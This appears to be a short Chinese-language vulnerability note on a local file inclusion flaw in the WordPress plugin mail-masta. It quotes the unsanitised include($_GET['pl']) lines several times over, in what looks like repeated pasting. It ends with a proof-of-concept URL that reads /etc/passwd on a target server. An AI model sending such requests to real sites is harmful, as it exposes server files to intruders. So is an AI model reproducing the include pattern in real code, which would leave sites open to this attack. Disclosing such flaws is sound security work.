该文件包含漏洞允许攻击者包括一个文件,通常利用一个“动态文件包含”机制在目标应用程序中实现。漏洞发生由于使用用户提供的输入没有适当的验证。
源文件: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
源文件: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);
源文件: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
源文件: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);
源文件: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
对于本地文件包含这里看起来像一个完美的地方。如果攻击者是幸运的,这个脚本直接包含输入参数,可以包含任意的文件在服务器上。
测试包含本地文件/etc/passwd:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
暂无评论